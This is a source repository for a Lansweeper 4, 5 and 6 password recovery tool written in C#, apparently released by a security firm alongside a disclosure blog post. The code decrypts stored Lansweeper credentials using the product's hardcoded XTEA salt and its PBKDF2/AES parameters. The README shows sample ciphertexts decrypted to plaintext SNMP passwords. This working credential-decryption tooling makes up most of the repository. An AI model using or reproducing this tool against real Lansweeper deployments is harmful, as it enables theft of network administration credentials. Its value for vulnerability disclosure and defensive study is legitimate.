├── .gitignore
├── LICENSE
├── LPR.sln
├── LPR5
├── Crypto.cs
├── LPR5.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Xtea.cs
└── app.config
├── LPR6
├── App.config
├── CryptoClass.cs
├── LPR6.csproj
├── PasswordRecovery.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Test_Ciphers_File.txt
└── Test_Encryption_File.txt
└── README.md
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | bld/
21 | [Bb]in/
22 | [Oo]bj/
23 | [Ll]og/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | artifacts/
46 |
47 | *_i.c
48 | *_p.c
49 | *_i.h
50 | *.ilk
51 | *.meta
52 | *.obj
53 | *.pch
54 | *.pdb
55 | *.pgc
56 | *.pgd
57 | *.rsp
58 | *.sbr
59 | *.tlb
60 | *.tli
61 | *.tlh
62 | *.tmp
63 | *.tmp_proj
64 | *.log
65 | *.vspscc
66 | *.vssscc
67 | .builds
68 | *.pidb
69 | *.svclog
70 | *.scc
71 |
72 | # Chutzpah Test files
73 | _Chutzpah*
74 |
75 | # Visual C++ cache files
76 | ipch/
77 | *.aps
78 | *.ncb
79 | *.opendb
80 | *.opensdf
81 | *.sdf
82 | *.cachefile
83 | *.VC.db
84 | *.VC.VC.opendb
85 |
86 | # Visual Studio profiler
87 | *.psess
88 | *.vsp
89 | *.vspx
90 | *.sap
91 |
92 | # TFS 2012 Local Workspace
93 | $tf/
94 |
95 | # Guidance Automation Toolkit
96 | *.gpState
97 |
98 | # ReSharper is a .NET coding add-in
99 | _ReSharper*/
100 | *.[Rr]e[Ss]harper
101 | *.DotSettings.user
102 |
103 | # JustCode is a .NET coding add-in
104 | .JustCode
105 |
106 | # TeamCity is a build add-in
107 | _TeamCity*
108 |
109 | # DotCover is a Code Coverage Tool
110 | *.dotCover
111 |
112 | # NCrunch
113 | _NCrunch_*
114 | .*crunch*.local.xml
115 | nCrunchTemp_*
116 |
117 | # MightyMoose
118 | *.mm.*
119 | AutoTest.Net/
120 |
121 | # Web workbench (sass)
122 | .sass-cache/
123 |
124 | # Installshield output folder
125 | [Ee]xpress/
126 |
127 | # DocProject is a documentation generator add-in
128 | DocProject/buildhelp/
129 | DocProject/Help/*.HxT
130 | DocProject/Help/*.HxC
131 | DocProject/Help/*.hhc
132 | DocProject/Help/*.hhk
133 | DocProject/Help/*.hhp
134 | DocProject/Help/Html2
135 | DocProject/Help/html
136 |
137 | # Click-Once directory
138 | publish/
139 |
140 | # Publish Web Output
141 | *.[Pp]ublish.xml
142 | *.azurePubxml
143 | # TODO: Comment the next line if you want to checkin your web deploy settings
144 | # but database connection strings (with potential passwords) will be unencrypted
145 | *.pubxml
146 | *.publishproj
147 |
148 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
149 | # checkin your Azure Web App publish settings, but sensitive information contained
150 | # in these scripts will be unencrypted
151 | PublishScripts/
152 |
153 | # NuGet Packages
154 | *.nupkg
155 | # The packages folder can be ignored because of Package Restore
156 | **/packages/*
157 | # except build/, which is used as an MSBuild target.
158 | !**/packages/build/
159 | # Uncomment if necessary however generally it will be regenerated when needed
160 | #!**/packages/repositories.config
161 | # NuGet v3's project.json files produces more ignoreable files
162 | *.nuget.props
163 | *.nuget.targets
164 |
165 | # Microsoft Azure Build Output
166 | csx/
167 | *.build.csdef
168 |
169 | # Microsoft Azure Emulator
170 | ecf/
171 | rcf/
172 |
173 | # Windows Store app package directories and files
174 | AppPackages/
175 | BundleArtifacts/
176 | Package.StoreAssociation.xml
177 | _pkginfo.txt
178 |
179 | # Visual Studio cache files
180 | # files ending in .cache can be ignored
181 | *.[Cc]ache
182 | # but keep track of directories ending in .cache
183 | !*.[Cc]ache/
184 |
185 | # Others
186 | ClientBin/
187 | ~$*
188 | *~
189 | *.dbmdl
190 | *.dbproj.schemaview
191 | *.pfx
192 | *.publishsettings
193 | node_modules/
194 | orleans.codegen.cs
195 |
196 | # Since there are multiple workflows, uncomment next line to ignore bower_components
197 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
198 | #bower_components/
199 |
200 | # RIA/Silverlight projects
201 | Generated_Code/
202 |
203 | # Backup & report files from converting an old project file
204 | # to a newer Visual Studio version. Backup files are not needed,
205 | # because we have git ;-)
206 | _UpgradeReport_Files/
207 | Backup*/
208 | UpgradeLog*.XML
209 | UpgradeLog*.htm
210 |
211 | # SQL Server files
212 | *.mdf
213 | *.ldf
214 |
215 | # Business Intelligence projects
216 | *.rdl.data
217 | *.bim.layout
218 | *.bim_*.settings
219 |
220 | # Microsoft Fakes
221 | FakesAssemblies/
222 |
223 | # GhostDoc plugin setting file
224 | *.GhostDoc.xml
225 |
226 | # Node.js Tools for Visual Studio
227 | .ntvs_analysis.dat
228 |
229 | # Visual Studio 6 build log
230 | *.plg
231 |
232 | # Visual Studio 6 workspace options file
233 | *.opt
234 |
235 | # Visual Studio LightSwitch build output
236 | **/*.HTMLClient/GeneratedArtifacts
237 | **/*.DesktopClient/GeneratedArtifacts
238 | **/*.DesktopClient/ModelManifest.xml
239 | **/*.Server/GeneratedArtifacts
240 | **/*.Server/ModelManifest.xml
241 | _Pvt_Extensions
242 |
243 | # Paket dependency manager
244 | .paket/paket.exe
245 | paket-files/
246 |
247 | # FAKE - F# Make
248 | .fake/
249 |
250 | # JetBrains Rider
251 | .idea/
252 | *.sln.iml
253 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2016 GoSecure inc.
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/LPR.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LPR5", "LPR5\LPR5.csproj", "{5133C36F-E228-4ED2-A464-44D0A3FD05F8}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LPR6", "LPR6\LPR6.csproj", "{98D8EC86-C606-4D38-B6DF-A25F0466D12F}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Any CPU = Debug|Any CPU
13 | Release|Any CPU = Release|Any CPU
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {5133C36F-E228-4ED2-A464-44D0A3FD05F8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {5133C36F-E228-4ED2-A464-44D0A3FD05F8}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {5133C36F-E228-4ED2-A464-44D0A3FD05F8}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {5133C36F-E228-4ED2-A464-44D0A3FD05F8}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {98D8EC86-C606-4D38-B6DF-A25F0466D12F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {98D8EC86-C606-4D38-B6DF-A25F0466D12F}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {98D8EC86-C606-4D38-B6DF-A25F0466D12F}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | {98D8EC86-C606-4D38-B6DF-A25F0466D12F}.Release|Any CPU.Build.0 = Release|Any CPU
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/LPR5/Crypto.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 | using System.Diagnostics;
4 |
5 | namespace LPR5
6 | {
7 | public class Crypto
8 | {
9 | public static string GetStaticSalt()
10 | {
11 | StringBuilder stringBuilder1 = new StringBuilder();
12 | int num1 = 0;
13 | string PwDstr;
14 | do
15 | {
16 | stringBuilder1.Append(Char.ConvertFromUtf32(checked(40 - num1 + (num1 * 2 + num1) - 1)));
17 | stringBuilder1.Append(Char.ConvertFromUtf32(checked(num1 + 15 + num1)));
18 | checked { ++num1; }
19 | }
20 | while (num1 <= 60);
21 | PwDstr = stringBuilder1.ToString();
22 | return PwDstr;
23 | }
24 |
25 | public static string DecryptPassword(string encryptedPassword)
26 | {
27 | string str1 = "";
28 | XTea xtea = new XTea();
29 | string str2 = "";
30 | try
31 | {
32 | byte[] numArray = Convert.FromBase64String(encryptedPassword);
33 | string @string = Convert.ToString(Char.ConvertFromUtf32((int)numArray[0]));
34 | int index1 = 1;
35 | do
36 | {
37 | str1 += Convert.ToString(Char.ConvertFromUtf32((int)numArray[index1]));
38 | checked { ++index1; }
39 | }
40 | while (index1 <= 8);
41 | byte[] Data = new byte[checked(numArray.Length - 9 - 1 + 1)];
42 | int num1 = 9;
43 | int num2 = checked(numArray.Length - 1);
44 | int index2 = num1;
45 | while (index2 <= num2)
46 | {
47 | Data[checked(index2 - 9)] = numArray[index2];
48 | checked { ++index2; }
49 | }
50 | str2 = xtea.Decrypt(Data, str1 + GetStaticSalt());
51 | if (@string.Contains("1"))
52 | str2 = str2.Substring(0, (str2.Length - 1));
53 | }
54 | catch (Exception ex)
55 | {
56 | Debug.WriteLine(ex.Message);
57 | }
58 | return str2;
59 | }
60 | }
61 | }
62 |
--------------------------------------------------------------------------------
/LPR5/LPR5.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {5133C36F-E228-4ED2-A464-44D0A3FD05F8}
8 | Exe
9 | Properties
10 | LPR4and5
11 | LPR4and5
12 | v4.5
13 | 512
14 |
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 | false
26 |
27 |
28 | AnyCPU
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 | false
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
62 |
--------------------------------------------------------------------------------
/LPR5/Program.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * Lansweeper 4 & 5 Password Recovery tool.
3 | * by Martin Lemay, GoSecure Canada Inc. 2016
4 | *
5 | * Update: Finally implemented the Xtea stuff. No need for the dependency anymore.
6 | *
7 | */
8 | using System;
9 |
10 | namespace LPR5
11 | {
12 | class Program
13 | {
14 | static void usage()
15 | {
16 | Console.WriteLine("[*] Usage: LPR4and5.exe ");
17 | Console.ReadLine();
18 | }
19 | static void Main(string[] args)
20 | {
21 | if (args.Length != 1)
22 | {
23 | usage();
24 | return;
25 | }
26 |
27 | String password = args[0].ToString();
28 | Console.WriteLine(string.Format("[*] Decrypting Lansweeper Password: {0}\n[*] Note that this operation will NOT take a while...", password));
29 |
30 |
31 | String result = Crypto.DecryptPassword(password);
32 | Console.WriteLine(string.Format("\n[-] Recovered: {0}", result));
33 | Console.ReadLine();
34 | }
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/LPR5/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("LPR")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("LPR")]
13 | [assembly: AssemblyCopyright("Copyright © 2016")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("f462cab5-72de-44c5-bc35-5af13b637787")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/LPR5/Xtea.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
4 | namespace LPR5
5 | {
6 | public class XTea
7 | {
8 | private const uint delta = 2654435769;
9 | private const uint num_rounds = 32;
10 |
11 | private byte[] ConvertUIntToBytes(uint Input)
12 | {
13 | return new byte[4]
14 | {
15 | (byte) (Input & (uint) byte.MaxValue),
16 | (byte) (Input >> 8 & (uint) byte.MaxValue),
17 | (byte) (Input >> 16 & (uint) byte.MaxValue),
18 | (byte) (Input >> 24 & (uint) byte.MaxValue)
19 | };
20 | }
21 |
22 | private uint ConvertBytesToUInt(byte Input1, byte Input2, byte Input3, byte Input4)
23 | {
24 | return (uint)Input1 + ((uint)Input2 << 8) + ((uint)Input3 << 16) + ((uint)Input4 << 24);
25 | }
26 |
27 | private uint ConvertStringToUInt(string Input)
28 | {
29 | return (uint)Input[0] + ((uint)Input[1] << 8) + ((uint)Input[2] << 16) + ((uint)Input[3] << 24);
30 | }
31 |
32 | private uint ConvertBytesToUInt(byte[] Input)
33 | {
34 | return (uint)Input[0] + ((uint)Input[1] << 8) + ((uint)Input[2] << 16) + ((uint)Input[3] << 24);
35 | }
36 |
37 | private uint[] FormatKey(string Key)
38 | {
39 | if (Key.Length == 0)
40 | throw new ArgumentException("Key must be between 1 and 16 characters in length");
41 | Key = Key.PadRight(16, ' ').Substring(0, 16);
42 | uint[] numArray = new uint[4];
43 | int num = 0;
44 | int startIndex = 0;
45 | while (startIndex < Key.Length)
46 | {
47 | numArray[num++] = this.ConvertStringToUInt(Key.Substring(startIndex, 4));
48 | startIndex += 4;
49 | }
50 | return numArray;
51 | }
52 |
53 | private void code(uint[] v, uint[] k)
54 | {
55 | uint num1 = v[0];
56 | uint num2 = v[1];
57 | uint num3 = 0;
58 | for (uint index = 0; index < 32U; ++index)
59 | {
60 | num1 += (uint)(((int)num2 << 4 ^ (int)(num2 >> 5)) + (int)num2 ^ (int)num3 + (int)k[(int)(num3 & 3U)]);
61 | num3 += 2654435769U;
62 | num2 += (uint)(((int)num1 << 4 ^ (int)(num1 >> 5)) + (int)num1 ^ (int)num3 + (int)k[(int)(num3 >> 11 & 3U)]);
63 | }
64 | v[0] = num1;
65 | v[1] = num2;
66 | }
67 |
68 | private void decode(uint[] v, uint[] k)
69 | {
70 | uint num1 = 3337565984;
71 | uint num2 = v[0];
72 | uint num3 = v[1];
73 | for (uint index = 0; index < 32U; ++index)
74 | {
75 | num3 -= (uint)(((int)num2 << 4 ^ (int)(num2 >> 5)) + (int)num2 ^ (int)num1 + (int)k[(int)(num1 >> 11 & 3U)]);
76 | num1 -= 2654435769U;
77 | num2 -= (uint)(((int)num3 << 4 ^ (int)(num3 >> 5)) + (int)num3 ^ (int)num1 + (int)k[(int)(num1 & 3U)]);
78 | }
79 | v[0] = num2;
80 | v[1] = num3;
81 | }
82 |
83 | public byte[] Encrypt(string Data, string Key)
84 | {
85 | if (Data.Length == 0)
86 | throw new ArgumentException("Data must be at least 1 character in length.");
87 | uint[] k = this.FormatKey(Key);
88 | if (Data.Length % 2 != 0)
89 | Data += (string)(object)' ';
90 | byte[] bytes = Encoding.Unicode.GetBytes(Data);
91 | byte[] numArray = new byte[Data.Length * 4];
92 | uint[] v = new uint[2];
93 | int index = 0;
94 | while (index < bytes.Length)
95 | {
96 | v[0] = (uint)bytes[index];
97 | v[1] = (uint)bytes[index + 1];
98 | this.code(v, k);
99 | Buffer.BlockCopy((Array)this.ConvertUIntToBytes(v[0]), 0, (Array)numArray, index * 4, 4);
100 | Buffer.BlockCopy((Array)this.ConvertUIntToBytes(v[1]), 0, (Array)numArray, (index + 1) * 4, 4);
101 | index += 2;
102 | }
103 | return numArray;
104 | }
105 |
106 | public string Decrypt(byte[] Data, string Key)
107 | {
108 | uint[] k = this.FormatKey(Key);
109 | int num1 = 0;
110 | uint[] v = new uint[2];
111 | byte[] bytes = new byte[Data.Length / 8 * 2];
112 | int index1 = 0;
113 | while (index1 < Data.Length)
114 | {
115 | v[0] = this.ConvertBytesToUInt(Data[index1], Data[index1 + 1], Data[index1 + 2], Data[index1 + 3]);
116 | v[1] = this.ConvertBytesToUInt(Data[index1 + 4], Data[index1 + 5], Data[index1 + 6], Data[index1 + 7]);
117 | this.decode(v, k);
118 | byte[] numArray1 = bytes;
119 | int index2 = num1;
120 | int num2 = 1;
121 | int num3 = index2 + num2;
122 | int num4 = (int)(byte)v[0];
123 | numArray1[index2] = (byte)num4;
124 | byte[] numArray2 = bytes;
125 | int index3 = num3;
126 | int num5 = 1;
127 | num1 = index3 + num5;
128 | int num6 = (int)(byte)v[1];
129 | numArray2[index3] = (byte)num6;
130 | index1 += 8;
131 | }
132 | return Encoding.Unicode.GetString(bytes, 0, bytes.Length);
133 | }
134 | }
135 | }
136 |
--------------------------------------------------------------------------------
/LPR5/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/LPR6/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/LPR6/CryptoClass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Security.Cryptography;
4 |
5 | namespace Lansweeper6_PasswordRecovery
6 | {
7 | public class CryptoClass
8 | {
9 | private byte[] Key;
10 | private byte[] blob;
11 | private byte[] iv;
12 | private Pbkdf2 pbkdf2;
13 | private byte[] AESKey;
14 |
15 |
16 | public string Decrypt(string cipher)
17 | {
18 | string password = "";
19 |
20 | // Initializing PBKDF2 parameters
21 | pbkdf2 = new Pbkdf2(Key);
22 |
23 | // Deriving AES key from PBKDF2 algorithm.
24 | Rfc2898DeriveBytes pb = new Rfc2898DeriveBytes(
25 | pbkdf2.MasterKey,
26 | pbkdf2.Salt,
27 | pbkdf2.Iter);
28 | AESKey = pb.GetBytes(16);
29 |
30 | // Convert base64 input as binary blob
31 | byte[] tmp = new byte[Convert.FromBase64String(cipher).Length];
32 | tmp = Convert.FromBase64String(cipher);
33 | iv = new byte[16];
34 | blob = new byte[tmp.Length - 16];
35 | Array.Copy(tmp, 0, iv, 0, 16);
36 | Array.Copy(tmp, 16, blob, 0, blob.Length);
37 |
38 |
39 | // Prepare AES
40 | using (Aes aes = (Aes)new AesCryptoServiceProvider())
41 | {
42 | aes.Key = AESKey;
43 | aes.IV = iv;
44 | aes.Padding = PaddingMode.PKCS7;
45 | ICryptoTransform decryptor = aes.CreateDecryptor();
46 | using (MemoryStream memoryStream = new MemoryStream(blob))
47 | {
48 | using (CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, decryptor, CryptoStreamMode.Read))
49 | {
50 | using (StreamReader streamReader = new StreamReader((Stream)cryptoStream))
51 | password = streamReader.ReadToEnd();
52 | }
53 | }
54 | }
55 | return password;
56 | }
57 |
58 | public CryptoClass(byte[] key)
59 | {
60 | Key = key;
61 | }
62 | }
63 |
64 | /*
65 | * Rfc2898Derivedbytes aka PBKDF2 parameters.
66 | */
67 | public class Pbkdf2
68 | {
69 | public byte[] Salt { get; }
70 | public int Iter { get; }
71 | public byte[] MasterKey { get; }
72 | public Pbkdf2(byte[] masterKey)
73 | {
74 | MasterKey = masterKey;
75 | Salt = new byte[8] {
76 | (byte) 39,
77 | (byte) 15,
78 | (byte) 41,
79 | (byte) 17,
80 | (byte) 43,
81 | (byte) 19,
82 | (byte) 45,
83 | (byte) 21 };
84 | Iter = 10000;
85 | }
86 | }
87 | }
88 |
--------------------------------------------------------------------------------
/LPR6/LPR6.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {98D8EC86-C606-4D38-B6DF-A25F0466D12F}
8 | Exe
9 | Properties
10 | Lansweeper6_PasswordRecovery
11 | Lansweeper6_PasswordRecovery
12 | v4.5.2
13 | 512
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
62 |
--------------------------------------------------------------------------------
/LPR6/PasswordRecovery.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 |
5 | namespace Lansweeper6_PasswordRecovery
6 | {
7 | class PasswordRecovery
8 | {
9 | private string KeyFilename;
10 | private string CipherFilename;
11 | private byte[] Key;
12 | private Dictionary Credentials;
13 | private CryptoClass Crypto;
14 |
15 | public PasswordRecovery(string keyFilename, string cipherFilename)
16 | {
17 | KeyFilename = keyFilename;
18 | CipherFilename = cipherFilename;
19 | Key = new byte[1024];
20 | Credentials = new Dictionary();
21 | Crypto = null;
22 | }
23 |
24 | public bool LoadFiles()
25 | {
26 | bool res = true;
27 | if (KeyFilename == null || CipherFilename == null)
28 | return res;
29 |
30 | Console.WriteLine(string.Format("[*] Loading key file {0}.", KeyFilename));
31 | Key = File.ReadAllBytes(KeyFilename);
32 | Console.WriteLine(string.Format("[*] Processing {0} bytes for the key file.", Key.Length));
33 | if (Key != null && Key.Length > 0)
34 | Crypto = new CryptoClass(Key);
35 | /*
36 | * Cipher File should consist of user:password delimited by comma.
37 | * Passwords should be base64 encoded.
38 | * Credentials should be one per line.
39 | */
40 | Console.WriteLine(string.Format("[*] Loading cipher file {0}", CipherFilename));
41 | foreach (string s in File.ReadAllLines(CipherFilename))
42 | {
43 | Console.WriteLine(string.Format("[*] Loading cipher line {0}", s));
44 | Credentials.Add(s.Split(':')[0],
45 | s.Split(':')[1]);
46 | }
47 | res = false;
48 | return res;
49 | }
50 |
51 | public void DecryptAll()
52 | {
53 | if (Crypto == null)
54 | {
55 | Console.WriteLine("[x] Error processing the key file...quit.");
56 | return;
57 | }
58 |
59 | string password;
60 |
61 | foreach(KeyValuePair kv in Credentials)
62 | {
63 | password = "";
64 | password = kv.Value;
65 |
66 | Console.WriteLine(string.Format("[-] Recovered password for user {0} as {1}",
67 | kv.Key,
68 | Crypto.Decrypt(kv.Value)
69 | ));
70 | }
71 | }
72 |
73 |
74 | }
75 | }
76 |
--------------------------------------------------------------------------------
/LPR6/Program.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * Lansweeper 6 Password Recovery tool.
3 | * by Martin Lemay, GoSecure Canada Inc. 2016
4 | *
5 | * You need the encryption key file located in %Lansweeper Install Folder%\Key\Encryption.txt
6 | * You also need a text file with encrypted passwords. Refer to the Test_Ciphers_File.txt file at the
7 | * root of the current VC project.
8 | */
9 | using System;
10 |
11 | namespace Lansweeper6_PasswordRecovery
12 | {
13 | class Program
14 | {
15 | static void usage()
16 | {
17 | Console.WriteLine("Usage: Lansweeper6_PasswordRecovery ");
18 | }
19 |
20 | static void header()
21 | {
22 |
23 | }
24 |
25 | static void Main(string[] args)
26 | {
27 | header();
28 | if (args.Length != 2)
29 | {
30 | usage();
31 | return;
32 | }
33 | Console.WriteLine(string.Format("[*] Processing files {0}, {1}.", args[0].ToString(), args[1].ToString()));
34 |
35 | PasswordRecovery pr = new PasswordRecovery(args[0].ToString(), args[1].ToString());
36 | pr.LoadFiles();
37 | pr.DecryptAll();
38 |
39 | Console.Write("Press any key...");
40 | Console.ReadLine();
41 | }
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/LPR6/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Lansweeper6_PasswordRecovery")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Lansweeper6_PasswordRecovery")]
13 | [assembly: AssemblyCopyright("Copyright © 2016")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("98d8ec86-c606-4d38-b6df-a25f0466d12f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/LPR6/Test_Ciphers_File.txt:
--------------------------------------------------------------------------------
1 | SNMP-Private:vX8OKLeWzlHtE/FMcCN0HqANgt6Y1083R1kz4sGeISU=
2 | SNMP-Public:JKBl770rqkNnF7G7Y5uGKmyqBMT9r9sZo5VYIAg5d6I=
3 |
--------------------------------------------------------------------------------
/LPR6/Test_Encryption_File.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GoSecure/LansweeperPasswordRecovery/e3980d62792e3bf794100e8bb74c23df26787d10/LPR6/Test_Encryption_File.txt
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # LansweeperPasswordRecovery
2 | Lansweeper 4, 5 & 6 Password Recovery Tool
3 |
4 | For more information see our blog post: http://blog.gosecure.ca/2016/04/21/your-credentials-at-risk-with-lansweeper-5/
5 |
6 | ## Installation
7 |
8 | - Open the C# project in Visual Studio 2015.
9 | - Compile and enjoy.
10 |
11 | ## Usage
12 |
13 | ```
14 | > LPR4and5.exe MVRtXmhzQXNpUzeu6JplTkcEqKyZ6K0vOdp/dakDvBT4YFC0vm52fr8YwiRnNZNxY7p2sk6IvM4mh6VCetFIpErgc2pzjvGxCg==
15 | [*] Decrypting Lansweeper Password: MVRtXmhzQXNpUzeu6JplTkcEqKyZ6K0vOdp/dakDvBT4YFC0vm52fr8YwiRnNZNxY7p2sk6IvM4mh6VCetFIpErgc2pzjvGxCg==
16 | [*] Note that this operation will NOT take a while...
17 |
18 | [-] Recovered: private
19 |
20 | ...
21 |
22 | > LPR6.exe Test_Encryption_File.txt Test_Ciphers_File.txt
23 | [*] Processing files Test_Encryption_File.txt, Test_Ciphers_File.txt.
24 | [*] Loading key file Test_Encryption_File.txt.
25 | [*] Processing 1024 bytes for the key file.
26 | [*] Loading cipher file test.txt
27 | [*] Loading cipher line SNMP-Private:vX8OKLeWzlHtE/FMcCN0HqANgt6Y1083R1kz4sGeISU=
28 | [*] Loading cipher line SNMP-Public:JKBl770rqkNnF7G7Y5uGKmyqBMT9r9sZo5VYIAg5d6I=
29 | [-] Recovered password for user SNMP-Private as private
30 | [-] Recovered password for user SNMP-Public as public
31 | ```
32 |
--------------------------------------------------------------------------------